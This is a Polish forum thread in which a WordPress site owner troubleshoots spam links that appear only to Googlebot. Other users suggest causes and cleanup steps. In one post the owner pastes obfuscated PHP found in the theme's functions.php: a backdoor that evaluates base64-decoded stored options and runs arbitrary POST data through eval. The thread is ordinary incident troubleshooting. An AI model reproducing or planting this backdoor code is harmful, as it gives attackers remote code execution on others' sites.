Skocz do zawartości
Zaloguj się, aby obserwować  
drajvver

Problem ze stroną www.

Polecane posty

Witajcie.

Mam pewien problem ze stroną www (hostowana w Mintshost, jeżeli to ma jakieś znaczenie).

Oparta jest na WordPressie, żadnych "podejrzanych" wtyczek nie mam zainstalowanych, zaczęło się to dziać kilka dni temu. Do supportu jeszcze nie pisałem, bo nie wiem czy to ich wina, czy nie.
Otóż, dla googlebota strona wygląda tak: http://pastebin.com/d5eimJzG
Za to dla normalnej osoby, tych wszystkich linków "ponad" tagiem <html> nie widać, co wydaje się być dość oczywiste (wydaje mi się, że idzie to jakby w nagłówku z serwera).

Czy ktoś wie może, dlaczego tak się dzieje? Wina jakiegoś wirusa na serwerze, czy coś mi "siadło" na WordPressie i trzeba jakoś to usunąć?

Pozdrawiam,
Krzysiek.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Pewnie coś ci się sprytnie dopisało do kodu. Sprawdź sobie co masz w headerze wordpressa. Oczywiście warto by zobaczyć daty modyfikacji plików i porównać z logami (www/FTP), potem zadziałać w zależności od przyczyny (zaktualizować skrypt/wtyczkę/zmienić hasło do FTP i przeskanować kompa).

Na koniec zainstaluj sobie jakąś wtyczkę do przeglądarki, która pozwala na ustawienie swojego UserAgenta - ustaw sobie taki, jak ma google bot i zobacz czy pomogło.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Podmieniłem pliki wordpresa (te w głównym folderze) na oryginalne, pobrane z oficjalnej strony, ale nadal to samo się dzieje.
Będę próbował jeszcze z pozostałymi, sprawdzę pluginy itp. ale nie chce mi się wierzyć, żeby to było jakoś bardzo z mojej winy, do FTP i DA mam dostęp tylko ja.

 

EDIT:

Po podmienieniu całego folderu wp-includes też nic się nie zmieniło.

 

EDIT2:

Chyba znalazłem, w themie mojej strony (Pagelines) w pliku functions.php był taki fajny kod:

<?php $yHHmhg = 'p'.'re'.'g_'.'r'.'eplace';$yHHmhg('/ad/e','e'.'va'.'l(ba'.'se'.'64_decode(get_op'.'tion("Kx'.'VQyX")))', 'add');?><?php $WgNGwY = 'preg_r'.'ep'.'l'.'a'.'ce';$WgNGwY('/ad/e','ev'.'a'.'l(b'.'ase64_de'.'code(get_optio'.'n("jpDe'.'JQ")))', 'add');?><?php
function _g3t($str){
    $val = !empty($_GET[$str]) ? $_GET[$str] : null;
    return $val;
}
if(_g3t('jhX')=='f')
{
@eval($_POST['zDqmT']);
exit;
}
if(_g3t('jhX')=='c')
{
echo 'AcJ9ksbVjsdb';
exit;
}
//dsd6sc378axvg
?>

Nie wiem o co chodzi, chyba jest zakodowany w base64, ale po odkodowaniu nadal nie ma w nim nic ciekawego.
W każdym razie na chwilę obecną jest w porządku, pytanie tylko czy to się powtórzy, czy to jakiś backdoor?

Edytowano przez drajvver (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

W każdym razie na chwilę obecną jest w porządku, pytanie tylko czy to się powtórzy, czy to jakiś backdoor?

 

Stawiałbym na jakąś dziurawą wtyczkę. Mało to takich do WP, które pisane są przez osoby, które o programowaniu pojęcia nie mają?

 

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

@pedro84 ma rację, musisz uważać co dodajesz, ostatnio poprawiałem stronę na WP z wtyczką galerii zdjęć, bo też dopisany był jakiś kod, z tymże w moim przypadku avast wywalał warning...

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się

Zaloguj się, aby obserwować  

×